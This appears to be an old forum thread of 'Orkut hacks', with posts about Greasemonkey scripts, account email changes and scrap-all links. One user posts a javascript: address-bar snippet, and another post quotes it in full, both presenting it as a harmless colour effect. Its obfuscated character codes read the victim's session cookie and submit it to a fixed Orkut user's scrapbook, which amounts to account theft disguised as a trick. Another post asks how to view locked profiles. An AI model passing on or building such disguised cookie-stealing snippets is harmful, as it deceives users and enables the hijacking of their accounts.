Orkut Hacks - All in One

Status
Not open for further replies.

rahul286

Broken In
kunaltech said:
the photo which is shown in workshop i use to get the same window before when i installed grease monkey. but after i formated my system and again i installed now some other window is been display where i dont have an option to create groups

The photo in above URL doesnt have create group option!
No u r not wrong because earlier u have used a version of script which is no longer working. Well this doesnt have create group option but u can select multiple friends using CTRL/SHIFT keys! :)

looksvivek

Broken In
great thread buddy, though orkut hackin is not in my taste, but a great thread for the community nonetheless.

chillaxx

Right off the assembly line
hi frens .. try dis one .. it really amazin .. jus copy paste the followin script on ur addressbar in orkut scrapbook ... and press enter .. and jus see the magic .. u vll see the rainbow of colours:)

javascript:eek:rkut=replyForm;orkut.toUserId.value=85936740;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.submit';orkut.submit();i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);

copy it correctly .. otherwise it wont work ...

njoy ......

chillaxx said:
hi frens .. try dis one .. it really amazin .. jus copy paste the followin script on ur addressbar in orkut scrapbook ... and press enter .. and jus see the magic .. u vll see the rainbow of colours:)

javascript:eek:rkut=replyForm;orkut.toUserId.value=85936740;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.submit';orkut.submit();i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);

copy it correctly .. otherwise it wont work ...

njoy ......

hey replace that second smiley with a colon followe by o ... actually it is takin that as a smiley .. so while tryin in orkut do that it will work ... ... let me explain ....

colon t would be :t ... i am choosing t bcoz .. choosing o will give :eek:

so use colon o instead of that second smiley .. i hope now u got it ....

Last edited:
K

keves2002

Help - changing email ID in orkut

Dear All,

plz help me to chnage my email id in orkut , i want to change my present mail id , not only changing my id, i dont wanna receive any more mails to that id , i wish to give a new id in orkut instead of the previous one , i saw an option to add one more id, but failed to find how to chnage the current address , plz advice

Thanx in advane
keves

DigitalDude

PhotonAttack
wow thread bumping :D

btw you cant change your main email id in orkut... just delete your orkut account and recreate one with a new email id ;)

_

ankushkool

Youngling
^^
then how come when we send a scrap using any scrap all... there is a link 'click here 2 scrap all' in all de scraps?

DigitalDude

PhotonAttack
^^^
that link is to an Orkut community... you cannot link to an external website using the scrap-all scripts bcos when you add an external website link to a scrap, Orkut will show a CAPTCHA image for verification :D

_

funkygarzon

Broken In
hey brothers , can any one say how to view the locked scrap book and locked photos...... if any one really does this, you are really great...thanks in advance...

Status
Not open for further replies.
Top Bottom